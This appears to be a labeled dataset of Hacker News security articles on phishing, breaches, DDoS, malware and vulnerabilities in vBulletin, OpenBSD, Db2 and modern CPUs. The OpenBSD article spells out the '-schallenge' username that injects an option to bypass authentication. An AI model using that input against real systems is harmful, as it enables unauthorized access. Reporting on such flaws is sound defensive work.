Hackers Are Targeting Facebook via spreading malware !,https://thehackernews.com/2011/02/hackers-are-targeting-facebook-via.html,"Facebook accounts are becoming favorite targets of hackers. If your account has been hacked, you could be in good company considering Facebook founder Mark Zuckerberg and French President Sarkozy have also been victims. Actually, thousands -- maybe millions -- of Facebook pages have been hacked. The hackers then use the accounts to send out erroneous messages to ""friends.""
One of your friends seems to have sent you a video or awesome photo or link, and suggests you click on it. The computer screen tells you to log in again to see the video or photo or quiz. But as soon as you sign in, you are giving your information to a hacking site, which now has your screen name and password.You probably would be suspicious of a strange e-mail in your inbox, but when you believe you are getting a link from a friend on a social network, you might not be so cautious.
You have actually been caught by one of the most common forms of hacking called ""phishing."" Recently estimated 1.5 million Facebook accounts are listed for sale on a website discovered by Verisign's iDefense Labs. The names were sold for as much as $45 for accounts with more than 10 friends. They are considered a way of spreading malware rather than strictly for identity theft.
People who find out that their Facebook accounts have been hacked, should immediately reset their passwords. They should also send Facebook a message, which will allow the company to look into the situation further.
",Malware
vBulletin Releases Patch Update for New RCE and SQLi Vulnerabilities,https://thehackernews.com/2019/10/vBulletin-hacking-exploit.html,"After releasing a patch for a critical zero-day remote code execution vulnerability late last month, vBulletin has recently published a new security patch update that addresses 3 more high-severity vulnerabilities in its forum software.
If left unpatched, the reported security vulnerabilities, which affect vBulletin 5.5.4 and prior versions, could eventually allow remote attackers to take complete control over targeted web servers and steal sensitive user information.
Written in PHP, vBulletin is a widely used proprietary Internet forum software package that powers over 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums.
Discovered by application security researcher Egidio Romano, the first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw, while the other two are SQL injection issues, both assigned a single ID as CVE-2019-17271.
vBulletin RCE and SQLi Flaws
The RCE flaw resides in the way vBulletin forum handles user requests to update avatars for their profiles, an icon or graphical representation of the user, allowing a remote attacker to inject and execute arbitrary PHP code on the target server through unsanitized parameters.
However, it should be noted that this vulnerability is not exploitable in the default installation of the vBulletin forum, rather exploitation is possible when ""Save Avatars as Files"" option is enabled by the website administrator.
Romano has also released a public proof-of-concept exploit for this RCE vulnerability.
The other two vulnerabilities are read in-band and time-based SQL injection issues that reside in two separate endpoints and could allow administrators with restricted privileges to read sensitive data from the database, which they otherwise may not be allowed to access.
Since these two SQL injection flaws can not be exploited by any registered user and require special permissions, vBulletin forum administrators and users need not to panic.
Security Patches Released
Romano responsibly reported all the vulnerabilities to the vBulletin project maintainers just last week on September 30, and the team acknowledged his findings and released the following security patch updates that address the reported flaws.
vBulletin 5.5.4 Patch Level 2
vBulletin 5.5.3 Patch Level 2
vBulletin 5.5.2 Patch Level 2
Administrators are highly recommended to apply the security patch before hackers started exploiting the vulnerabilities to target their forum users—just like someone did last week to steal login information of nearly 245,000 Comodo Forums users after the company failed to apply available patches on time.
",Vulnerability
Warning — Bitcoin Users Could Be Targeted by State-Sponsored Hackers,https://thehackernews.com/2016/08/bitcoin-software-hack.html,"Another day, another bad news for Bitcoin users.
A leading Bitcoin information site is warning users that an upcoming version of the Blockchain consolidation software and Bitcoin wallets could most likely be targeted by ""state-sponsored attackers.""
Recently, one of the world's most popular cryptocurrency exchanges, Bitfinex, suffered a major hack that resulted in a loss of around $72 Million worth of Bitcoins.
Now, Bitcoin.org, the website that hosts downloads for Bitcoin Core, posted a message on its website on Wednesday warning users that the next version of the Bitcoin Core wallet, one of the most popular bitcoin wallets used to store bitcoins, might be replaced with a malicious version of the software offered by government-backed hackers.
Specifically, Chinese bitcoin users and services are encouraged to be vigilant ""due to the origin of the attackers.""
Bitcoin.org doesn't believe it has sufficient resources to defend against the attack. However, the website did not reveal the name of the country planning the attack.
The Warning Message from the Bitcoin.org site reads:
""Bitcoin.org has reason to suspect that the binaries for the upcoming Bitcoin Core release will likely be targeted by state-sponsored attackers. As a website, Bitcoin.org does not have the necessary technical resources to guarantee that we can defend ourselves from attackers of this calibre. We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website.""
""In such a situation, not being careful before you download [the software] could cause you to lose all your coins. This malicious software might also cause your computer to participate in attacks against the Bitcoin network.""
Also Read: Bitcoin Exchange Offers $3.5 Million Reward for Information of Stolen Bitcoins.
In such cases, it is likely that hackers will try to hijack and replace the official binary files used to run Bitcoin software on mining pools, either:
By compromising the Bitcoin.org official site
By conducting a man-in-the-middle attack to fake a cryptographic certificate that would allow hackers to intercept victim's encrypted HTTPS connection and replace the legitimate download with a malicious one, tricking users into installing a malicious version of the Bitcoin software.
However, Bitcoin Core developer Eric Lombrozo told The Reg that ""there's absolutely nothing in the Bitcoin Core binaries, as built by the Bitcoin Core team, that has been targeted by state-sponsored attackers that we know of at this point.""
""Perhaps certain sites where people download the binaries could end up getting compromised, but let's not unnecessarily spread paranoia about the Bitcoin Core binaries themselves.""
Verify Signatures and Hashes
As a countermeasure, users are recommended to verify the Signature securely and hashes of Bitcoin Core binaries that are cryptographically signed with a key before running Bitcoin Core binaries to ensure the binaries are legitimate as being created by the Core developers team.
""We strongly recommend that you download that key, which should have a fingerprint of 01EA5486DE18A882D4C2684590C8019E36C2E964. You should securely verify the signature and hashes before running any Bitcoin Core binaries,"" the advisory states.
Moreover, you are advised to download the binaries from the official Bitcoin site only; otherwise, you may end up getting compromised.
",Cyber_Attack
"Indian Banks may switch to Linux, rather than taking extended Windows XP Support",https://thehackernews.com/2014/03/indian-banks-switching-to-linux-rather.html,"As we have reported you earlier that Microsoft is pulling out their Windows XP support after April 8 2014. Since a vast majority of bank ATMs around the world currently runs on Windows XP, but if they'll continue sticking to it after the deadline, then they'll be exposed to all kinds of security threats, as Microsoft will no longer provide the security patches thereafter.
Many countries' Banks have got a way out, many banks have arranged or are in the process of arranging extended support for Windows XP for which they are ready to pay Microsoft millions of dollars, but may be not in the case of India. Yes, India will never feed Microsoft for providing extra support to the older version; rather they could switch over to the Linux operating system.
India has around 115,000 ATMs across the country at present and the counts will go up in coming days, but the end of life for XP will not affect banks and functioning of ATMs as the financial institutions across the country are well prepared for life without the much popular OS, according to the Indian Banks Association (IBA).
ATMs will continue to run the outdated system for some time past the expiration date, thanks to Windows Embedded powering ATMs, cash registers. According to Microsoft, Windows XP Embedded is less susceptible to viruses, and the company is providing support for it until early 2016.
IBA says neither branches nor cash vending machines will be shut down once Microsoft stops support for the system from April 8. Many Banks have already moved to Windows 7, or are in the process of moving, which will require hardware upgrades and some are considering to choose Linux. These hardware upgrades and software enhancements might be a costly headache for ATM manufacturers and banks, but the improvements are a win for customers who use these machines on a daily basis.
""Banks are definitely well-prepared and the industry is seized of the matter. I am very sure that you will not see a problem where ATMs or bank counters are shut because of this,"" said the industry lobby's chief executive MV Tanksale at an event in Mumbai. ""Only the old ATMs may face some problem as all the newer machines are running on newer platforms,"" he added.
Indian banks do not themselves operate their ATMs, rather outsource them to third-party vendors like Diebold and NCR.
Girish Chavan, national manager of Diebold said, ""all ATMs are not connected to the Internet so a hacker would need to reach it through the bank's network,....and to breach a bank's firewall is not easy."" But maybe firms are underestimating the tactics of hackers and cybercriminals, who are always one step ahead in hacking ATMs and defeating all current security mechanisms.
A few months back it was revealed at the Chaos Computing Congress that hackers in Europe are targeting ATM Machines using Malware-loaded USB drives to steal money.
The malware infection rate for Windows XP is already almost six times higher than Windows 8 systems. So, to switch on to the other operating system will benefit the organizations and financial institutions.
Moreover, Indian ATM manufacturer Vortex offers a low-power Linux based system called Ecoteller, for example, that's being used in developing countries.
The Reserve Bank of India had highlighted the issue on Tuesday, saying banking operations may be hit once the Windows XP gets phased out.
""Banks are definitely well prepared and the industry is seized of the matter. I am very sure that you will not see a problem where ATMs or bank counters are shut because of this,"" chief executive MV Tanksale said.
""The probability of attacks on such a system may increase and it may be difficult to defend such attacks in the absence of Microsoft support,"" RBI had said in a circular to banks.
The Tamil Nadu State Government's has recently advised all its departments to move on to free open source software BOSS Linux as a key benefit of it will ultimately be a huge saving to the government.
""Consider installing BOSS (Bharat Operating System Solutions) Linux as one of the mandatory operating system,"" said the order issued by the TN Information Technology Department. ""The huge investment cost involved in purchasing closed source software (such as Windows XP) may be avoided, which in turn translates into huge savings for the government,"" the order stated.
So, if your Bank is planning to upgrade their ATMs, should it be Windows 7/8 or Linux??
",Malware
"Hacker Who DDoSed Sony, EA and Steam Gaming Servers Pleads Guilty",https://thehackernews.com/2018/11/gaming-server-ddos-attack.html,"A 23-year-old hacker from Utah pleaded guilty this week to launching a series of denial-of-service (DoS) attacks against multiple online services, websites, and online gaming companies between 2013 and 2014.
According to a Justice Department (DoJ) press release, Austin Thompson, a.k.a. ""DerpTroll,"" took down servers of several major gaming platforms including Electronic Arts' Origin service, the Sony PlayStation network, and Valve Software's Steam, between December 2013 and January 2014, by flooding them with enough internet traffic.
Thompson then typically used the Twitter account the @DerpTrolling handle to announce his attacks, subsequently posting screenshots or other photos of the server being unavailable after launching DDoS attacks.
The attacks usually took down game servers and related computers of the victim companies for at least a few hours at a time, causing at least $95,000 in damages to the gaming companies around the world.
""Denial-of-service attacks cost businesses millions of dollars annually,"" said U.S. Attorney Adam Braverman while announcing the plea. ""We are committed to finding and prosecuting those who disrupt businesses, often for nothing more than ego.""
Thompson pleaded guilty in federal court in San Diego on Thursday and was charged with causing damages to a protected computer, which carries a maximum penalty of 10 years prison, a fine of $250,000, as well as three years supervised release.
Active since 2011, the DerpTrolling hacking group is believed to be operated by Thompson, who write malware used to launch the DDoS attacks against online services around the world.
However, the hacking group made headlines in late 2013 and early 2014 after disrupting online gaming servers owned by Sony, Riot Games, Microsoft, Nintendo, Valve, and Electronic Arts.
Thompson's sentencing is scheduled for March 1, 2019, before United States District Judge Jeffrey Miller.
It wasn't just DerpTrolling that created chaos in 2014. The infamous Lizard Squad hacking group also made headlines in 2014 by launching DDoS attacks against Microsoft Xbox Live and Sony PlayStation Network and knocking them offline during the Christmas holidays.
Several teenagers last year from around the world were charged with participating in the Lizard Squad 2014 DDoS attacks.
",Cyber_Attack
Yahoo! Hack! How It Took Just One-Click to Execute Biggest Data Breach in History,https://thehackernews.com/2017/03/yahoo-data-breach-hack.html,"In the digital world, it just takes one click to get the keys to the kingdom.
Do you know spear-phishing was the only secret weapon behind the biggest data breach in the history?
It's true, as one of the Yahoo employees fell victim to a simple phishing attack and clicked one wrong link that let the hackers gain a foothold in the company's internal networks.
You may be familiar with phishing attacks — an attempt to steal user credentials or financial data — while, Spear-phishing is a targeted form of phishing in which attackers trick employees or vendors into providing remote-access credentials or opening a malicious attachment containing an exploit or payload.
Here's how the Yahoo's massive data breach was traced back to human error and who were the alleged masterminds behind this hack.
On Wednesday, the US government charged two Russian spies (Dmitry Dokuchaev and Igor Sushchin) and two criminal hackers (Alexsey Belan and Karim Baratov) in connection with the 2014 Yahoo hack that compromised about 500 million Yahoo user accounts.
While the indictment provided details on the 2014 Yahoo hack, the FBI officials recently gave a fresh insight into how the two officers from the Russian Federal Security Service (FSB) hired two hackers to gained initial access to Yahoo in early 2014.
Here's How the Yahoo Hack Initiated:
The hack began with a ""Spear Phishing"" e-mail sent to a ""semi-privileged"" Yahoo employees and not the company's top executives early in 2014.
Although it is unclear how many Yahoo employees were targeted in the attack and how many emails were sent by the hackers, it only takes one employee to click on either a malicious attachment or a link, and it gave attackers direct access to Yahoo's internal networks.
Russian Spies HIRED Cyber Criminals to Hack Into Yahoo Servers; Here's How They Did It.
CLICK TO TWEET
Once in, Alexsey Belan, who is already on the FBI's Most Wanted Hackers list, started poking around the network and, according to the FBI, discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to edit the database.
Belan used the file transfer protocol (FTP) to download the Yahoo database, containing usernames, phone numbers, security questions and answers, and, what's worse, password recovery emails and a cryptographic value unique to each Yahoo account.
Recovery emails and unique cryptographic values enabled Belan and fellow hacker Baratov to access the accounts of certain users requested by the Russian spies, Dokuchaev and Sushchin.
Since the Account Management Tool did not allow for simple text searches of usernames, the hackers began identifying targets based on their recovery email address.
Once identified, the hackers then used stolen cryptographic values called ""nonces"" to generate forged access cookies for specific user accounts, giving both the FSB agents and Belan access to users' email accounts without the need for any password.
According to the FBI, those cookies were generated many times between 2015 and 2016 to access ""more than 6,500 Yahoo accounts,"" out of the roughly 500 million accounts.
Victims Targeted by the Russian Spies:
According to the indictment, among other foreign webmail and Internet-related service providers, the Russian spies accessed the Yahoo accounts belonging to:
An assistant to the deputy chairman of Russia.
An officer in Russia's Ministry of Internal Affairs.
A trainer working in Russia's Ministry of Sports.
Russian journalists.
Officials of states bordering Russia.
U.S. government workers.
An employee of a Swiss Bitcoin wallet company.
A U.S. airline worker.
FBI special agent John Bennett told a news conference that Yahoo first approached the bureau in 2014, regarding the hack and was ""great partners"" during its investigation.
However, the company took two years to go public in December 2016 with details of the data breach and advised hundreds of millions of its customers to change their passwords.
Baratov was arrested on Tuesday by the Toronto Police Department, while Belan and the two FSB officers are in Russia. The United States has requested all the three to be handed over to face charges, but the US has no extradition treaty with Russia.
",Data_Breaches
Dell Resets All Customers' Passwords After Potential Security Breach,https://thehackernews.com/2018/11/dell-data-breach-hacking.html,"Multinational computer technology company Dell disclosed Wednesday that its online electronics marketplace experienced a ""cybersecurity incident"" earlier this month when an unknown group of hackers infiltrated its internal network.
On November 9, Dell detected and disrupted unauthorized activity on its network attempting to steal customer information, including their names, email addresses and hashed passwords.
According to the company, the initial investigation found no conclusive evidence that the hackers succeeded to extract any information, but as a countermeasure Dell has reset passwords for all accounts on Dell.com website whether the data had been stolen or not.
Dell did not share any information on how hackers managed to infiltrate its network at the first place or how many user accounts were affected, but the company did confirm that payment information and Social Security numbers were not targeted.
""Credit card and other sensitive customer information were not targeted. The incident did not impact any Dell products or services,"" Dell says.
You are affected if you have ever created an account on the Dell website to purchase any of their products or to access the online support.
""Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation. Dell also retained a digital forensics firm to conduct an independent investigation and has engaged law enforcement,"" the company said.
We will update this story as more information becomes available.
",Data_Breaches
Ecuador Bank Hacked — $12 Million Stolen in 3rd Attack on SWIFT System,https://thehackernews.com/2016/05/swift-banking-hack.html,"Bangladesh is not the only bank that had become victim to the cyber heist. In fact, it appears to be just a part of the widespread cyber attack on global banking and financial sector by hackers who target the backbone of the world financial system, SWIFT.
Yes, the global banking messaging system that thousands of banks and companies around the world use to transfer Billions of dollars in transfers each day is under attack.
A third case involving SWIFT has emerged in which cyber criminals have stolen about $12 million from an Ecuadorian bank that contained numerous similarities of later attacks against Bangladesh's central bank that lost $81 Million in the cyber heist.
The attack on Banco del Austro (BDA) in Ecuador occurred in January 2015 and, revealed via a lawsuit filed by BDA against Wells Fargo, a San Francisco-based bank on Jan. 28, Reuters reported.
Here's how cyber criminals target banks:
Uses malware to circumvent local security systems of a bank.
Gains access to the SWIFT messaging network.
Sends fraudulent messages via SWIFT to initiate cash transfers from accounts at larger banks.
Over ten days, hackers used SWIFT credentials of a bank employee to modify transaction details for at least 12 transfers amounting to over $12 Million, which was transferred to accounts in Hong Kong, Dubai, New York and Los Angeles.
In the lawsuit, BDA holds Wells Fargo responsible for not spotting the fraudulent transactions and has demanded Wells Fargo to return the full amount that was stolen from the bank.
The lawsuit filed by BDA in a New York federal court described that the some of these attacks could have been prevented if banks would have shared more details about the attacks with the SWIFT organization.
Wells Fargo has also fired back and blamed BDA's information security policies and procedures for the heist and noted that it ""properly processed the wire instructions received via authenticated SWIFT messages,"" according to court documents.
According to reports, the heist remained a secret for a long time and now disclosed when BDA decided to sue Wells Fargo that approved the fraudulent transfers.
SWIFT did not have any idea about the breach, as neither BDA nor Wells Fargo shared any detail about the attack.
""We were not aware,"" SWIFT said in a statement. ""We need to be informed by customers of such frauds if they relate to our products and services so that we can inform and support the wider community. We have been in touch with the bank concerned to get more information, and are reminding customers of their obligations to share such information with us.""
It turns out that the security of SWIFT itself was not breached in the attack, but cyber criminals used advanced malware to steal credentials of bank's employees and cover their tracks.
In February, $81 Million cyberheist at the Bangladesh central bank was carried out by hacking into SWIFT using a piece of malware that manipulated logs and erased the fraudulent transactions history, and even prevented printers from printing those transactions.
",Cyber_Attack
Android Trojan GingerMaster Uses Gingerbread Root Exploit,https://thehackernews.com/2011/08/android-trojan-gingermaster-uses.html,"Android Trojan GingerMaster Uses Gingerbread Root Exploit
As our smartphones become more ubiquitous and more powerful, they need to be protected in much the same way that you would protect your computer. Further to this, a malicious piece of malware has been discovered for devices powered by Android 2.3.3 Gingerbread, giving the hacker the ability to take complete control of the smartphone remotely. According to Assistant Professor Xuxian Jiang from the NCSU Department of Computer Science, the new threat, which his team has dubbed GingerMaster, is the first malware to use the root exploit for Android 2.3. ""As this is the first time such malware has been identified, it is not surprising when our experiments show that it can successfully evade the detection of all tested (leading) mobile anti-virus software,"" he writes.
Once the GingerMaster malware is installed and has root privileges, it then reaches out to a remote command-and-control server and asks for instructions. It then has the ability to download and install apps on its own, without the user's permission, Jiang found. GingerMaster is an evolution of the existing DroidKungFu malware, which had some of the same functionality. Earlier this week, Jiang's team also found other variants of DroidKungFu in several dozen infected apps in alternate Android app stores. That version included a couple of root exploits as well, but for earlier versions of Android.
As far as we can tell, no ""official"" applications being offered through Android Market have been affected by GingerMaster, but it's best to err on the side of caution when it comes to these things. Recognize that your Android smartphone is very much a computer and, as such, is just as vulnerable to attacks as your home PC. The researchers recommend that users take several steps to protect themselves. The first one is to run a mobile antivirus product. There are several free solutions available from vendors like Lookout, AVG, BitDefender or Symantec.Then, users should only download apps from trusted marketplaces, like the official Android Market. Unfortunately, there is no assurances that malware won't slip through the cracks and appear on these services from time to time, but the chances are lower than in other places.Finally, users should make a habit from reading and understanding the permissions requested by apps on installation. Trojanized apps will usually require permissions that legit versions wouldn't need.
",Malware
Malware that transfers stolen data using Inaudible Audio signals,https://thehackernews.com/2013/12/Malware-Inaudible-Audio-signals-badbios-virus.html,"If you think that a computer which is not connected to a network, doesn't have any USB sticks attached to it and doesn't accept any kind of electronic connection requests are reasonably safe against hackers and from all the malware, then you are Wrong.
Here we have something shocking update that Some German Scientists have developed a proof of concept Malware prototype, could allow a hacker to infect your computers and other digital devices just using Inaudible Audio signals.
The ability to bridge an air gap could be a potent infection vector. Just imagine, a cyber attack using high-frequency sound waves to infect machines, where stolen data also can be transferred back to attacker without a network connection, Sounds very terrifying ?
When a few weeks ago, a security researcher Dragos Ruiu claimed malware dubbed badBIOS allowed infected machines to communicate using sound waves alone, means that the devices are physically disconnected from any networks, including the internet, people said he was crazy.
But Now German Researchers have published a paper on how malware can be designed to cross the air gap by transmitting information through speakers and recording it via microphone.
Rather than relying on TCP-IP, they used a network stack originally developed for underwater communication and the signal was propagated through the use of a software-defined modem based on the GNU Radio project.
In a scenario based hacking, ""The infected victim sends all recorded keystrokes to the covert acoustical mesh network. Infected drones forward the keystroke information inside the covert network till the attacker is reached, who is now able to read the current keyboard input of the infected victim from a distant place."" paper explained.
In another scenario, the researchers used sound waves to send keystroke information to a network-connected computer, which then sent the information to the attacker via email.
While the research doesn't prove Dragos Ruiu's badBIOS claims, but it does show that even if the system is disconnected from any network, could still be vulnerable to attackers. However, I would like to appreciate Dragos dedication about badBIOS research because this extraordinary concept was first introduced by him only.
Researchers POC Malware is able to transfer data at 20 bits per second only, which is very low, but that's still capable of transferring your password or credit card number to the hacker in a few seconds.
Some basic countermeasures one can adopt to protect against such malware are:
Switching off the audio input and output devices from the system.
Employ audio filtering that blocks high-frequency ranges.
Using an Audio Intrusion Detection Guard.
Lets see how Antivirus companies will handle such threats to protect home users.
",Malware
Severe Auth Bypass and Priv-Esc Vulnerabilities Disclosed in OpenBSD,https://thehackernews.com/2019/12/openbsd-authentication-vulnerability.html,"OpenBSD, an open-source operating system built with security in mind, has been found vulnerable to four new high-severity security vulnerabilities, one of which is an old-school type authentication bypass vulnerability in BSD Auth framework.
The other three vulnerabilities are privilege escalation issues that could allow local users or malicious software to gain privileges of an auth group, root, as well as of other users, respectively.
The vulnerabilities were discovered and reported by Qualys Research Labs earlier this week, in response to which OpenBSD developers released security patches for OpenBSD 6.5 and OpenBSD 6.6 just yesterday—that's in less than 40 hours.
Here's a brief explanation of all four security vulnerabilities in OpenBSD—a free and open-source BSD-based Unix-like operating system—along with their assigned CVE identifiers
OpenBSD Authentication Bypass (CVE-2019-19521)
The authentication bypass vulnerability resides in the way OpenBSD's authentication framework parses the username supplied by a user while logging in through smtpd, ldapd, radiusd, su, or sshd services.
Using this flaw, a remote attacker can successfully access vulnerable services with any password just by entering the username as ""-schallenge"" or ""-schallenge: passwd,"" and it works because a hyphen (-) before username tricks OpenBSD into interpreting the value as a command-line option and not as a username.
Here, OpenBSD's authentication framework interprets ""-schallenge"" as ""-s challenge,"" which forces the system into silently ignoring the challenge protocol that eventually bypasses the authentication automatically.
""If an attacker specifies a username of the form '-option', they can influence the behavior of the authentication program in unexpected ways,"" the advisory said.
According to the researchers, this vulnerability is practically exploitable in smtpd, ldapd, and radiusd, but not in sshd or su due to their defense-in-depth mechanisms that hang the connection even after successful authentication bypass.
However, one can still remotely exploit the flaw against sshd to determine whether an OpenBSD system is vulnerable to CVE-2019-19521 or not.
OpenBSD Local Privilege Escalation Flaws
As described above, the other OpenBSD vulnerabilities are local privilege escalation issues as briefly explained below:
CVE-2019-19520: Due to the mishandling of environment-provided paths used in dlopen(), xlock, which comes installed by default on OpenBSD, could allow local attackers to escalate privileges to 'auth' group.
CVE-2019-19522: Due to incorrect operation of authorization mechanisms via ""S/Key"" and ""YubiKey,"" which is a non-default configuration, a local attacker with 'auth' group permission can gain full privileges of the root user.
CVE-2019-19519: Due to a logical error in one of the su's primary functions, a local attacker can achieve any user's login class, often excluding root, by exploiting su's -L option.
Qualys researchers have also released proof-of-concept exploits for each vulnerability in its advisory.
Since patches for all four security vulnerabilities are now available, affected OpenBSD users recommended to install patches using syspatch mechanism.
",Vulnerability
Anti-DDoS Services Abused to Carry Out DDoS Attack with 1.5 Billion Requests/Minute,https://thehackernews.com/2014/05/anti-ddos-services-abuse-to-ddos-at-15.html,"Till Now the Internet was encountering the traditional Distributed Denial of Service (DDoS) attacks, where a large number of compromised systems use to flood servers with tremendous amount of bandwidth; but in past few months we have noticed massive change in the techniques of DDoS attack.
Hackers are using creative, but evil DDoS techniques such as NTP and DNS Amplification DDoS attacks. Last month we have seen that how cybercriminals abused a vulnerability in one of the biggest Chinese video hosting website Sohu.com to convert their millions of visitors to participate into the Layer 7 (Application Layer) DDoS attack with 20 Million requests.
According to the new report released by a US based security solutions provider Incapsula, another interesting DDoS attack activities have been noticed by the researchers in which an attacker abused two major anti-DDoS Service providers to perform massive DDoS attack on other websites.
Its really EPIC that the services who should protect websites from DDoS attack, itself compromised to perform DDoS on other web services.
The researchers at the security firm noticed a surge of massive DNS DDoS attack on one of its client, peaking at approximately 25Mpps (Million packets per second).
""With multiple reports coming from different directions, and with several large scale attacks on our own infrastructure, we are now convinced that what we are seeing here is an evolving new trend - one that can endanger even the most hardened network infrastructures,"" reads the report.
This time, hacker used the DNS DDoS attack, which is totally different and more responsive from the previously most commonly used DNS amplification attack by the hackers, both in their methods of execution and in the type of trouble they aim to deliver.
DNS amplification attack is an asymmetrical DDoS attack in which the attacker set the source address to that of the targeted victim by using spoofed Internet Protocol (IP) of the target, which means the target receives the replies from all the DNS servers that are used, making it the recipient of much larger DNS responses. ""With these attacks the offender's goal is to achieve network saturation by continuously exhausting the target's bandwidth capacity,"" Incapsula wrote.
But its totally different in the case of DNS DDoS attack as DNS floods are symmetrical DDoS attacks in which the attacker tries to exhaust the server-side assets (for e.g., memory or CPU) with the large number of UDP requests generated by the malicious scripts running on several compromised botnet machines. The packets sends per seconds are even larger in this case compare to DNS amplification attack.
""With DNS amplification, the effectiveness of an attacker's own resources is increased by anywhere from 300% to 1000%, which means that large attacks could be initiated by relatively small botnets"", says the report. ""On the other hand, with DNS floods there is no multiplier to speak of at all. This means that, in order to generate a DNS flood at the rate of 25Mpps, the offender needs access to an equally powerful botnet infrastructure.""
By using the same DNS DDoS attack, the hacker succeeded in sending the malicious requests through two different servers at a rate of 1.5 Billion DNS queries per minute, amounting to over 630 Billion requests during the course of the 7 hour-long DDoS attack.
Both the servers used by the attacker belongs to anti-DDoS service providers, one of which is based in Canada and the other in China. After acknowledging the attack, Incapsula informed both the anti-DDoS vendors, which then dropped the responsible clients from using their services.
""Malicious misuse of security solutions is anything but new. However, this is the first time we encountered ""rogue"" scrubbing servers used to carry out large-scale DDoS attacks. This fact, combined with the inherit danger of non-amplified DNS floods, is what makes these attacks so devastatingly dangerous,"" the researchers said.
DNS Amplification DDoS attack could be defended by dropping all unexpected DNS responses to port 53, whereas DNS Flood queries are difficult to differentiate from the legitimate DNS queries, and it is not possible to drop all DNS queries in order to migrate the attack. However this could be filtered when individually processed at the server level, but such process is practically very difficult to execute. Thankfully, the Impact of DNS Flood attack depends upon the capacity of the attacker's own resources.
As we all have seen that DDoS trend is changing and to perform massive DDoS attacks, hacker are using every tantrum by leveraging the weakness of different protocols and boosting the sizes of Distributed Denial of Service (DDoS) attack.
",Vulnerability
Experts Reported Security Bug in IBM's Db2 Data Management Software,https://thehackernews.com/2020/08/ibm-data-management.html,"Cybersecurity researchers today disclosed details of a memory vulnerability in IBM's Db2 family of data management products that could potentially allow a local attacker to access sensitive data and even cause a denial of service attacks.
The flaw (CVE-2020-4414), which impacts IBM Db2 V9.7, V10.1, V10.5, V11.1, and V11.5 editions on all platforms, is caused by improper usage shared memory, thereby granting a bad actor to perform unauthorized actions on the system.
By sending a specially crafted request, an attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service, according to Trustwave SpiderLabs security and research team, which discovered the issue.
""Developers forgot to put explicit memory protections around the shared memory used by the Db2 trace facility,"" SpiderLabs's Martin Rakhmanov said. ""This allows any local users read and write access to that memory area. In turn, this allows accessing critically sensitive data as well as the ability to change how the trace subsystem functions, resulting in a denial of service condition in the database.""
IBM released a patch on June 30 to remediate the vulnerability.
CVE-2020-4414 is caused by the unsafe usage of shared memory the Db2 trace utility employs to exchange information with the underlying OS on the system.
The Db2 trace utility is used to record Db2 data and events, including reporting Db2 system information, collecting data required for performance analysis and tuning, and capture data access audit trail for security purposes.
Given that the shared memory stores sensitive information, an attacker with access to the system could create a malicious application to overwrite the memory with rogue data dedicated to tracing data.
""This means that an unprivileged local user can abuse this to cause a denial of service condition simply by writing incorrect data over that memory section,"" Rakhmanov said.
Even more concerning, a low-privileged process running on the same computer as the Db2 database could alter Db2 trace and capture sensitive data and use the information to carry out other attacks.
If the flaw sounds familiar, that's because it's the same type of memory leakage vulnerability that impacted Cisco's WebEx video conferencing service (CVE-2020-3347) that could local authenticated attackers to get hold of usernames, authentication tokens, and meeting information.
It's recommended that Db2 users update their software to the latest version to mitigate the risk.
",Vulnerability
[Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks,https://thehackernews.com/2018/01/meltdown-spectre-patches.html,"Recently uncovered two huge processor vulnerabilities called Meltdown and Spectre have taken the whole world by storm, while vendors are rushing out to patch the vulnerabilities in its products.
The issues apply to all modern processors and affect nearly all operating systems (Windows, Linux, Android, iOS, macOS, FreeBSD, and more), smartphones and other computing devices made in the past 20 years.
What are Spectre and Meltdown?
We have explained both, Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753, CVE-2017-5715), exploitation techniques in our previous article.
In short, Spectre and Meltdown are the names of security vulnerabilities found in many processors from Intel, ARM and AMD that could allow attackers to steal your passwords, encryption keys and other private information.
Both attacks abuse 'speculative execution' to access privileged memory—including those allocated for the kernel—from a low privileged user process like a malicious app running on a device, allowing attackers to steal passwords, login keys, and other valuable information.
Protect Against Meltdown and Spectre CPU Flaws
Some, including US-CERT, have suggested the only true patch for these issues is for chips to be replaced, but this solution seems to be impractical for the general user and most companies.
Vendors have made significant progress in rolling out fixes and firmware updates. While the Meltdown flaw has already been patched by most companies like Microsoft, Apple and Google, Spectre is not easy to patch and will haunt people for quite some time.
Here's the list of available patches from major tech manufacturers:
Windows OS (7/8/10) and Microsoft Edge/IE
Microsoft has already released an out-of-band security update (KB4056892) for Windows 10 to address the Meltdown issue and will be releasing patches for Windows 7 and Windows 8 on January 9th.
But if you are running a third-party antivirus software then it is possible your system won't install patches automatically. So, if you are having trouble installing the automatic security update, turn off your antivirus and use Windows Defender or Microsoft Security Essentials.
""The compatibility issue is caused when antivirus applications make unsupported calls into Windows kernel memory,"" Microsoft noted in a blog post. ""These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot.""
Apple macOS, iOS, tvOS, and Safari Browser
Apple noted in its advisory, ""All Mac systems and iOS devices are affected, but there are no known exploits impacting customers at this time.""
To help defend against the Meltdown attacks, Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2, has planned to release mitigations in Safari to help defend against Spectre in the coming days.
Android OS
Android users running the most recent version of the mobile operating system released on January 5 as part of the Android January security patch update are protected, according to Google.
So, if you own a Google-branded phone, like Nexus or Pixel, your phone will either automatically download the update, or you'll simply need to install it. However, other Android users have to wait for their device manufacturers to release a compatible security update.
The tech giant also noted that it's unaware of any successful exploitation of either Meltdown or Spectre on ARM-based Android devices.
Firefox Web Browser
Mozilla has released Firefox version 57.0.4 which includes mitigations for both Meltdown and Spectre timing attacks. So users are advised to update their installations as soon as possible.
""Since this new class of attacks involves measuring precise time intervals, as a partial, short-term mitigation we are disabling or reducing the precision of several time sources in Firefox,"" Mozilla software engineer Luke Wagner wrote in a blog post.
Google Chrome Web Browser
Google has scheduled the patches for Meltdown and Spectre exploits on January 23 with the release of Chrome 64, which will include mitigations to protect your desktop and smartphone from web-based attacks.
In the meantime, users can enable an experimental feature called ""Site Isolation"" that can offer some protection against the web-based exploits but might also cause performance problems.
